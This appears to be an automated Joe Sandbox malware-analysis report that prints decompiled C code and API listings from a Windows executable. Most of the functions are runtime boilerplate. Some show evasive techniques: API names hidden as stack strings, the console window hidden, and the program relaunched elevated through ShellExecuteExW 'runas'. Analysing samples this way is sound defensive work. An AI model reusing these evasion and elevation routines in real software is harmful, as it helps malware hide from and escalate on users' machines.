6261->6168 6262 401351 6262->6261 6263 401120 RaiseException 6262->6263 6263->6262 6264->6259 6266 40121f 6265->6266 6267 401226 6266->6267 6268 40122a SysStringByteLen SysAllocStringByteLen 6266->6268 6267->6262 6268->6267 6269->6235 6271 403842 _doexit 6270->6271 6272 401d99 __lock 69 API calls 6271->6272 6273 403849 6272->6273 6274 403885 _doexit 6273->6274 6276 40304b __decode_pointer 5 API calls 6273->6276 6284 4038ef 6274->6284 6278 403878 6276->6278 6280 40304b __decode_pointer 5 API calls 6278->6280 6279 4038ec _doexit 6279->5931 6280->6274 6282 4038e3 6283 4036d2 _malloc 3 API calls 6282->6283 6283->6279 6285 4038f5 6284->6285 6286 4038d0 6284->6286 6289 401cc1 LeaveCriticalSection 6285->6289 6286->6279 6288 401cc1 LeaveCriticalSection 6286->6288 6288->6282 6289->6286 7175 40bda0 7178 4012c0 SysFreeString 7175->7178 7177 40bdad 7178->7177 6787 407b23 6790 407be9 6787->6790 6789 407b52 6791 407c10 6790->6791 6792 407c1c RaiseException 6790->6792 6791->6792 6792->6789 6793 40ba24 6796 40b76b 6793->6796 6797 40b74a 6793->6797 6794 40158c __cftof_l 5 API calls 6795 40ba40 6794->6795 6796->6794 6797->6796 6798 401270 74 API calls 6797->6798 6799 40b88d 6798->6799 6800 401270 74 API calls 6799->6800 6801 40b899 6800->6801 6802 401160 2 API calls 6801->6802 6803 40b932 6802->6803 6804 401300 4 API calls 6803->6804 6805 40b93e 6804->6805 6806 4012e0 VariantClear 6805->6806 6807 40b9e7 6806->6807 6813 4012c0 SysFreeString 6807->6813 6809 40b9ef 6814 4012c0 SysFreeString 6809->6814 6811 40b9f7 6815 4012c0 SysFreeString 6811->6815 6813->6809 6814->6811 6815->6796 6870 4019e8 6871 4019f7 6870->6871 6872 4019fd 6870->6872 6873 403915 _abort 69 API calls 6871->6873 6875 401a02 _doexit 6872->6875 6876 403935 6872->6876 6873->6872 6877 403836 _doexit 69 API calls 6876->6877 6878 403940 6877->6878 6878->6875 7183 404aa8 7184 404aba 7183->7184 7186 404ac8 @_EH4_CallFilterFunc@8 7183->7186 7185 40158c __cftof_l 5 API calls 7184->7185 7185->7186 6879 407dea 6880 40304b __decode_pointer 5 API calls 6879->6880 6881 407dfd SetUnhandledExceptionFilter 6880->6881 6715 401c6c 6716 401c7a 6715->6716 6717 401c86 DeleteCriticalSection 6716->6717 6718 401c9e 6716->6718 6719 40159b __getptd_noexit 69 API calls 6717->6719 6720 401cb0 DeleteCriticalSection 6718->6720 6721 401cbe 6718->6721 6719->6716 6720->6718 7187 4058ac 7190 405711 7187->7190 7189 4058bb 7191 40571d _doexit 7190->7191 7192 403255 _LocaleUpdate::_LocaleUpdate 69 API calls 7191->7192 7193 405726 7192->7193 7194 4053c6 _LocaleUpdate::_LocaleUpdate 71 API calls 7193->7194 7195 405730 7194->7195 7221 4054ec 7195->7221 7198 403512 __malloc_crt 69 API calls 7199 405751 7198->7199 7200 405870 _doexit 7199->7200 7228 405566 7199->7228 7200->7189 7203 405781 InterlockedDecrement 7205 405791 7203->7205 7206 4057a2 InterlockedIncrement 7203->7206 7204 40587d 7204->7200 7208 405890 7204->7208 7211 40159b __getptd_noexit 69 API calls 7204->7211 7205->7206 7210 40159b __getptd_noexit 69 API calls 7205->7210 7206->7200 7207 4057b8 7206->7207 7207->7200 7213 401d99 __lock 69 API calls 7207->7213 7209 401b5b __cftof_l 69 API calls 7208->7209 7209->7200 7212 4057a1 7210->7212 7211->7208 7212->7206 7215 4057cc InterlockedDecrement 7213->7215 7216 40585b InterlockedIncrement 7215->7216 7217 405848 7215->7217 7237 405872 7216->7237 7217->7216 7219 40159b __getptd_noexit 69 API calls 7217->7219 7220 40585a 7219->7220 7220->7216 7222 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7221->7222 7223 4054fe 7222->7223 7224 405527 7223->7224 7225 405509 GetOEMCP 7223->7225 7226 40552c GetACP 7224->7226 7227 405519 7224->7227 7225->7227 7226->7227 7227->7198 7227->7200 7229 4054ec getSystemCP 81 API calls 7228->7229 7230 405584 7229->7230 7231 40558f setSBCS 7230->7231 7232 4055b7 GetCPInfo 7230->7232 7235 4055ca _memset __setmbcp_nolock 7230->7235 7233 40158c __cftof_l 5 API calls 7231->7233 7232->7231 7232->7235 7234 40570f 7233->7234 7234->7203 7234->7204 7240 40523c GetCPInfo 7235->7240 7250 401cc1 LeaveCriticalSection 7237->7250 7239 405879 7239->7200 7241 40531c 7240->7241 7243 405273 _memset 7240->7243 7246 40158c __cftof_l 5 API calls 7241->7246 7242 406aae ___crtGetStringTypeA 93 API calls 7244 4052d7 7242->7244 7243->7242 7245 406ed2 ___crtLCMapStringA 104 API calls 7244->7245 7247 4052f7 7245->7247 7248 4053be 7246->7248 7249 406ed2 ___crtLCMapStringA 104 API calls 7247->7249 7248->7235 7249->7241 7250->7239 6722 40326d 6724 403279 _doexit 6722->6724 6723 403291 6726 40329f 6723->6726 6728 40159b __getptd_noexit 69 API calls 6723->6728 6724->6723 6725 40159b __getptd_noexit 69 API calls 6724->6725 6727 40336d _doexit 6724->6727 6725->6723 6729 40159b __getptd_noexit 69 API calls 6726->6729 6732 4032ad 6726->6732 6728->6726 6729->6732 6730 40159b __getptd_noexit 69 API calls 6733 4032bb 6730->6733 6731 4032c9 6735 4032d7 6731->6735 6736 40159b __getptd_noexit 69 API calls 6731->6736 6732->6730 6732->6733 6733->6731 6734 40159b __getptd_noexit 69 API calls 6733->6734 6734->6731 6737 4032e8 6735->6737 6739 40159b __getptd_noexit 69 API calls 6735->6739 6736->6735 6738 401d99 __lock 69 API calls 6737->6738 6740 4032f0 6738->6740 6739->6737 6741 403315 6740->6741 6742 4032fc InterlockedDecrement 6740->6742 6756 403379 6741->6756 6742->6741 6743 403307 6742->6743 6743->6741 6746 40159b __getptd_noexit 69 API calls 6743->6746 6746->6741 6747 401d99 __lock 69 API calls 6748 403329 6747->6748 6749 40335a 6748->6749 6751 405078 ___removelocaleref 8 API calls 6748->6751 6759 403385 6749->6759 6754 40333e 6751->6754 6753 40159b __getptd_noexit 69 API calls 6753->6727 6754->6749 6755 404eb2 ___freetlocinfo 69 API calls 6754->6755 6755->6749 6762 401cc1 LeaveCriticalSection 6756->6762 6758 403322 6758->6747 6763 401cc1 LeaveCriticalSection 6759->6763 6761 403367 6761->6753 6762->6758 6763->6761 7251 4030ae TlsAlloc 6764 40bd70 6765 40bd7d _Error_objects 6764->6765 6766 4017bc __cinit 76 API calls 6765->6766 6767 40bd87 6766->6767 6816 402930 6817 402968 6816->6817 6818 40295b 6816->6818 6820 40158c __cftof_l 5 API calls 6817->6820 6819 40158c __cftof_l 5 API calls 6818->6819 6819->6817 6822 402978 __except_handler4 6820->6822 6821 4029ff 6822->6821 6823 4029d4 __except_handler4 6822->6823 6829 402a15 __cinit 6822->6829 6823->6821 6824 4029ef 6823->6824 6825 40158c __cftof_l 5 API calls 6823->6825 6826 40158c __cftof_l 5 API calls 6824->6826 6825->6824 6826->6821 6828 402a54 __except_handler4 6830 402a8b 6828->6830 6831 40158c __cftof_l 5 API calls 6828->6831 6834 404b3a RtlUnwind 6829->6834 6832 40158c __cftof_l 5 API calls 6830->6832 6831->6830 6833 402a9b @_EH4_CallFilterFunc@8 6832->6833 6834->6828 6882 407af0 6883 407b00 6882->6883 6884 407b16 6883->6884 6885 407b0f LocalFree 6883->6885 6885->6884 6886 4079f8 GetVersionExA 6887 407a2a InterlockedExchange 6886->6887 6889 407a4f 6887->6889 6890 40158c __cftof_l 5 API calls 6889->6890 6891 407a59 6890->6891 6768 40467c 6769 404688 SetLastError 6768->6769 6770 404690 _doexit 6768->6770 6769->6770 6892 4017fc 6893 401801 6892->6893 6894 401806 6892->6894 6895 403c28 __FF_MSGBANNER 69 API calls 6893->6895 6896 403a88 __NMSG_WRITE 69 API calls 6894->6896 6895->6894 6897 40180f 6896->6897 6898 4036d2 _malloc 3 API calls 6897->6898 6899 401819 6898->6899

                                                            Control-flow Graph

                                                            C-Code - Quality: 91%
                                                            			E0040AF60(void* __ebx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                            				struct _SHELLEXECUTEINFOW _v64;
                                                            				signed int _v68;
                                                            				char _v69;
                                                            				char _v70;
                                                            				char _v71;
                                                            				char _v72;
                                                            				char _v73;
                                                            				char _v74;
                                                            				char _v75;
                                                            				char _v76;
                                                            				_Unknown_base(*)()* _v80;
                                                            				signed int _t25;
                                                            				struct HINSTANCE__* _t28;
                                                            				void* _t40;
                                                            				signed int _t42;
                                                            
                                                            				_t25 =  *0x40f020; // 0xebf16b9c
                                                            				_v68 = _t25 ^ _t42;
                                                            				_v76 = 0x53;
                                                            				_v75 = 0x48;
                                                            				_v74 = 0x45;
                                                            				_v73 = 0x4c;
                                                            				_v72 = 0x4c;
                                                            				_v71 = 0x33;
                                                            				_v70 = 0x32;
                                                            				_v69 = 0;
                                                            				_t10 =  &_v76; // 0x53
                                                            				_t28 = LoadLibraryA(_t10); // executed
                                                            				_v80 = GetProcAddress(_t28, "ShellExecuteExW");
                                                            				_v64.cbSize = 0;
                                                            				E00402AD0(_t40,  &(_v64.fMask), 0, 0x38);
                                                            				_v64.cbSize = 0x3c;
                                                            				_v64.fMask = 0x440;
                                                            				_v64.lpParameters = _a8;
                                                            				_v64.nShow = 1;
                                                            				_v64.lpFile = _a4;
                                                            				_v64.lpVerb = L"runas";
                                                            				return E0040158C(ShellExecuteExW( &_v64), __ebx, _v68 ^ _t42, _a8, _t40, __esi);
                                                            			}


















                                                            0x0040af66
                                                            0x0040af6d
                                                            0x0040af70
                                                            0x0040af74
                                                            0x0040af78
                                                            0x0040af7c
                                                            0x0040af80
                                                            0x0040af84
                                                            0x0040af88
                                                            0x0040af8c
                                                            0x0040af95
                                                            0x0040af99
                                                            0x0040afa6
                                                            0x0040afa9
                                                            0x0040afb8
                                                            0x0040afc0
                                                            0x0040afc7
                                                            0x0040afd1
                                                            0x0040afd4
                                                            0x0040afde
                                                            0x0040afe1
                                                            0x0040affc

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(SHELL32,ShellExecuteExW), ref: 0040AF99
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040AFA0
                                                            • _memset.LIBCMT ref: 0040AFB8
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0040AFEC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressExecuteLibraryLoadProcShell_memset
                                                            • String ID: <$H$SHELL32$ShellExecuteExW
                                                            • API String ID: 729207603-281526968
                                                            • Opcode ID: 8ef38e38124d7f473b8f99363df40fe12ea4f623e51a9652085ebf00db1b050d
                                                            • Instruction ID: ea46c510b610b00ffe8adee838eb9b268168c7108b345ae6be4005dd780da530
                                                            • Opcode Fuzzy Hash: 8ef38e38124d7f473b8f99363df40fe12ea4f623e51a9652085ebf00db1b050d
                                                            • Instruction Fuzzy Hash: 01115BB0C04348DADB61CFE4D848BCDBFB4AF18308F044159E9087B281DBB9554ACB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 78%
                                                            			E0040BC10(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				char* _v28;
                                                            				struct HWND__* _v32;
                                                            				signed int _v36;
                                                            				char _v556;
                                                            				intOrPtr _v560;
                                                            				signed int _t21;
                                                            				struct HWND__* _t24;
                                                            				void* _t29;
                                                            				intOrPtr _t31;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t43;
                                                            				signed int _t44;
                                                            				void* _t45;
                                                            				void* _t46;
                                                            
                                                            				_t43 = __esi;
                                                            				_t42 = __edi;
                                                            				_t35 = __ebx;
                                                            				_t21 =  *0x40f020; // 0xebf16b9c
                                                            				_v36 = _t21 ^ _t44;
                                                            				_v24 = 0x736e6f43;
                                                            				_v20 = 0x57656c6f;
                                                            				_v16 = 0x6f646e69;
                                                            				_v12 = 0x616c4377;
                                                            				_v8 = 0x7373;
                                                            				_t7 =  &_v24; // 0x736e6f43
                                                            				_t24 = FindWindowA(_t7, 0); // executed
                                                            				_v32 = _t24;
                                                            				E0040B170(_v32); // executed
                                                            				_t46 = _t45 + 4;
                                                            				_v28 = L"-h";
                                                            				if(_a4 < 2) {
                                                            					L2:
                                                            					_v560 = E0040B230();
                                                            					_t41 =  &_v556;
                                                            					_v560(0,  &_v556, 0x208);
                                                            					_t29 = E0040AF60(_t35, _t43, _t49,  &_v556, _v28); // executed
                                                            					if(_t29 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_t31 = 0;
                                                            					}
                                                            				} else {
                                                            					_t41 = _v28;
                                                            					_t34 = E0040B000( *((intOrPtr*)(_a8 + 4)), _v28);
                                                            					_t46 = _t46 + 8;
                                                            					_t49 = _t34;
                                                            					if(_t34 != 0) {
                                                            						L4:
                                                            						E0040BA50(_t35, _t42, _t43);
                                                            						_t31 = 0;
                                                            						__eflags = 0;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            				return E0040158C(_t31, _t35, _v36 ^ _t44, _t41, _t42, _t43);
                                                            			}
























                                                            0x0040bc10
                                                            0x0040bc10
                                                            0x0040bc10
                                                            0x0040bc19
                                                            0x0040bc20
                                                            0x0040bc23
                                                            0x0040bc2a
                                                            0x0040bc31
                                                            0x0040bc38
                                                            0x0040bc3f
                                                            0x0040bc48
                                                            0x0040bc4c
                                                            0x0040bc52
                                                            0x0040bc59
                                                            0x0040bc5e
                                                            0x0040bc61
                                                            0x0040bc6c
                                                            0x0040bc85
                                                            0x0040bc8a
                                                            0x0040bc95
                                                            0x0040bc9e
                                                            0x0040bcaf
                                                            0x0040bcb9
                                                            0x00000000
                                                            0x0040bcbb
                                                            0x0040bcbb
                                                            0x0040bcbb
                                                            0x0040bc6e
                                                            0x0040bc6e
                                                            0x0040bc79
                                                            0x0040bc7e
                                                            0x0040bc81
                                                            0x0040bc83
                                                            0x0040bcbf
                                                            0x0040bcbf
                                                            0x0040bcc4
                                                            0x0040bcc4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040bc83
                                                            0x0040bcd3

                                                            APIs
                                                            • FindWindowA.USER32 ref: 0040BC4C
                                                              • Part of subcall function 0040B170: GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 0040B195
                                                            • _wcsstr.LIBCMTD ref: 0040BC79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressFindProcWindow_wcsstr
                                                            • String ID: ConsoleWindowClass
                                                            • API String ID: 1746155897-1331846550
                                                            • Opcode ID: 8a6c043029350c012949b2761951153b33feee4be2a24f493eedabaa1a1acd61
                                                            • Instruction ID: 059aed936bd4f7953ff50b647851c6ffa27fd3c0a4feb35440658e11611d5d8c
                                                            • Opcode Fuzzy Hash: 8a6c043029350c012949b2761951153b33feee4be2a24f493eedabaa1a1acd61
                                                            • Instruction Fuzzy Hash: 0B1160B0D00208ABDB10DFE1D946AAEB7B4EF08304F00816EE905B7281DB389604CFE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 24 40b130-40b167 LoadLibraryA call 40158c 26 40b16c-40b16f 24->26
                                                            C-Code - Quality: 84%
                                                            			E0040B130() {
                                                            				signed int _v8;
                                                            				char _v11;
                                                            				char _v12;
                                                            				char _v13;
                                                            				char _v14;
                                                            				char _v15;
                                                            				char _v16;
                                                            				signed int _t10;
                                                            				struct HINSTANCE__* _t13;
                                                            				intOrPtr _t15;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t20;
                                                            				signed int _t21;
                                                            
                                                            				_t10 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t10 ^ _t21;
                                                            				_v16 = 0x4f;
                                                            				_v15 = 0x4c;
                                                            				_v14 = 0x45;
                                                            				_v13 = 0x33;
                                                            				_v12 = 0x32;
                                                            				_v11 = 0;
                                                            				_t8 =  &_v16; // 0x4f
                                                            				_t13 = LoadLibraryA(_t8); // executed
                                                            				return E0040158C(_t13, _t15, _v8 ^ _t21, _t18, _t19, _t20);
                                                            			}

















                                                            0x0040b136
                                                            0x0040b13d
                                                            0x0040b140
                                                            0x0040b144
                                                            0x0040b148
                                                            0x0040b14c
                                                            0x0040b150
                                                            0x0040b154
                                                            0x0040b158
                                                            0x0040b15c
                                                            0x0040b16f

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(OLE32), ref: 0040B15C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: OLE32
                                                            • API String ID: 1029625771-2276369563
                                                            • Opcode ID: 980a06aea9a35d8a7ae7649d9989a00455e2bd3b3d54e8f512e950044cdb9623
                                                            • Instruction ID: d47033aa0ce206b92a5c2489ca363cbd33bce9cfa044549ede1ceb72ee371031
                                                            • Opcode Fuzzy Hash: 980a06aea9a35d8a7ae7649d9989a00455e2bd3b3d54e8f512e950044cdb9623
                                                            • Instruction Fuzzy Hash: FFF03020D0428CEADB01DBE8C44878CBFB85B15208F4480E985456B282D6795708C76A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 40b170-40b1aa call 40b0e0 GetProcAddress
                                                            C-Code - Quality: 58%
                                                            			E0040B170(intOrPtr _a4) {
                                                            				_Unknown_base(*)()* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            
                                                            				_v20 = 0x776f6853;
                                                            				_v16 = 0x646e6957;
                                                            				_v12 = 0x776f;
                                                            				_t4 =  &_v20; // 0x776f6853
                                                            				_v8 = GetProcAddress(E0040B0E0(), _t4);
                                                            				return _v8(_a4, 0);
                                                            			}







                                                            0x0040b176
                                                            0x0040b17d
                                                            0x0040b184
                                                            0x0040b18b
                                                            0x0040b19b
                                                            0x0040b1aa

                                                            APIs
                                                              • Part of subcall function 0040B0E0: LoadLibraryA.KERNEL32(USER32), ref: 0040B110
                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 0040B195
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ShowWindow
                                                            • API String ID: 2574300362-1268545403
                                                            • Opcode ID: a957005a050c3c7cee9ee321a0b9ae71f5b3dbb3a7dbfed1b9329c84cc1db1ba
                                                            • Instruction ID: 2938ed01b3610a0eb917c5aedbf5f10d734c743d9f5ae708fe635bca05b760e3
                                                            • Opcode Fuzzy Hash: a957005a050c3c7cee9ee321a0b9ae71f5b3dbb3a7dbfed1b9329c84cc1db1ba
                                                            • Instruction Fuzzy Hash: CDE04FB0C0420DEBCB00EFE0C90AAAEBB78FB00204F10859CE92867280E7749A008B94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 31 40bce0-40bce8 call 40b130 33 40bced-40bcfa GetProcAddress 31->33
                                                            C-Code - Quality: 100%
                                                            			E0040BCE0() {
                                                            				struct HINSTANCE__* _t1;
                                                            				_Unknown_base(*)()* _t2;
                                                            
                                                            				_t1 = E0040B130(); // executed
                                                            				_t2 = GetProcAddress(_t1, "CoInitializeSecurity");
                                                            				 *0x411060 = _t2;
                                                            				return _t2;
                                                            			}





                                                            0x0040bce8
                                                            0x0040bcee
                                                            0x0040bcf4
                                                            0x0040bcfa

                                                            APIs
                                                              • Part of subcall function 0040B130: LoadLibraryA.KERNELBASE(OLE32), ref: 0040B15C
                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 0040BCEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: CoInitializeSecurity
                                                            • API String ID: 2574300362-4240294626
                                                            • Opcode ID: 858e63394dc20911a5a2b4bc9d735a2b77d167d8c34a28d337205b0f396a1cd2
                                                            • Instruction ID: 9360bdbcb8040919587fa8726506409a21c246ffa320766f12b7ef0611b22f1f
                                                            • Opcode Fuzzy Hash: 858e63394dc20911a5a2b4bc9d735a2b77d167d8c34a28d337205b0f396a1cd2
                                                            • Instruction Fuzzy Hash: 40B09B7484430C97C50067E56C096057A5CE945A547104136B54971595D7755044C55D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 34 401bc9-401be7 HeapCreate 35 401be9-401beb 34->35 36 401bec-401bf9 call 401b6e 34->36 39 401bfb-401c08 call 401dca 36->39 40 401c1f-401c22 36->40 39->40 43 401c0a-401c1d HeapDestroy 39->43 43->35
                                                            C-Code - Quality: 100%
                                                            			E00401BC9(intOrPtr _a4) {
                                                            				void* _t6;
                                                            				intOrPtr _t7;
                                                            				void* _t10;
                                                            
                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                            				 *0x4103b4 = _t6;
                                                            				if(_t6 != 0) {
                                                            					_t7 = E00401B6E(__eflags);
                                                            					__eflags = _t7 - 3;
                                                            					 *0x4111cc = _t7;
                                                            					if(_t7 != 3) {
                                                            						L5:
                                                            						__eflags = 1;
                                                            						return 1;
                                                            					} else {
                                                            						_t10 = E00401DCA(0x3f8);
                                                            						__eflags = _t10;
                                                            						if(_t10 != 0) {
                                                            							goto L5;
                                                            						} else {
                                                            							HeapDestroy( *0x4103b4);
                                                            							 *0x4103b4 =  *0x4103b4 & 0x00000000;
                                                            							goto L1;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					return 0;
                                                            				}
                                                            			}






                                                            0x00401bda
                                                            0x00401be2
                                                            0x00401be7
                                                            0x00401bec
                                                            0x00401bf1
                                                            0x00401bf4
                                                            0x00401bf9
                                                            0x00401c1f
                                                            0x00401c21
                                                            0x00401c22
                                                            0x00401bfb
                                                            0x00401c00
                                                            0x00401c05
                                                            0x00401c08
                                                            0x00000000
                                                            0x00401c0a
                                                            0x00401c10
                                                            0x00401c16
                                                            0x00000000
                                                            0x00401c16
                                                            0x00401c08
                                                            0x00401be9
                                                            0x00401be9
                                                            0x00401beb
                                                            0x00401beb

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040191E,00000001), ref: 00401BDA
                                                            • HeapDestroy.KERNEL32 ref: 00401C10
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Heap$CreateDestroy
                                                            • String ID:
                                                            • API String ID: 3296620671-0
                                                            • Opcode ID: 97ab96e9f71bcaa33df601b14429b25905b46657d09f8824084d419041d220c1
                                                            • Instruction ID: 7a46a3d2506183b1fa3ee5d0035033dae20cdc213793c08df3dd9dbf1a3001fa
                                                            • Opcode Fuzzy Hash: 97ab96e9f71bcaa33df601b14429b25905b46657d09f8824084d419041d220c1
                                                            • Instruction Fuzzy Hash: 48E09230698305EFEB106B70AE0936636E4E74074AF00883EF600E50F4FBB8C480DA0C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 44 4036d2-4036e0 call 4036ac ExitProcess
                                                            C-Code - Quality: 100%
                                                            			E004036D2(int _a4) {
                                                            
                                                            				E004036AC(_a4);
                                                            				ExitProcess(_a4);
                                                            			}



                                                            0x004036d6
                                                            0x004036e0

                                                            APIs
                                                            • ___crtCorExitProcess.LIBCMT ref: 004036D6
                                                              • Part of subcall function 004036AC: GetModuleHandleA.KERNEL32(mscoree.dll,004036DB,?,00405951,000000FF,0000001E,00000001,00000000,00000000,?,0040351F,?,00000001,?,00401D23,00000018), ref: 004036B1
                                                              • Part of subcall function 004036AC: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004036C1
                                                            • ExitProcess.KERNEL32 ref: 004036E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                            • String ID:
                                                            • API String ID: 2427264223-0
                                                            • Opcode ID: 3819742ebc53de71990435e9f2c10b37127336b8a94d75d022c06b3f46a52c46
                                                            • Instruction ID: a07d56fe43460000000566a6c44e306eae857fe116f2a4537ab27f894ce8fb9f
                                                            • Opcode Fuzzy Hash: 3819742ebc53de71990435e9f2c10b37127336b8a94d75d022c06b3f46a52c46
                                                            • Instruction Fuzzy Hash: FBB00271004540FFD6152F51DE4B41E7FA5EF90715F10893DF049541B19B7A9D64FE09
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 47 403904-40390c call 403836 49 403911-403914 47->49
                                                            C-Code - Quality: 25%
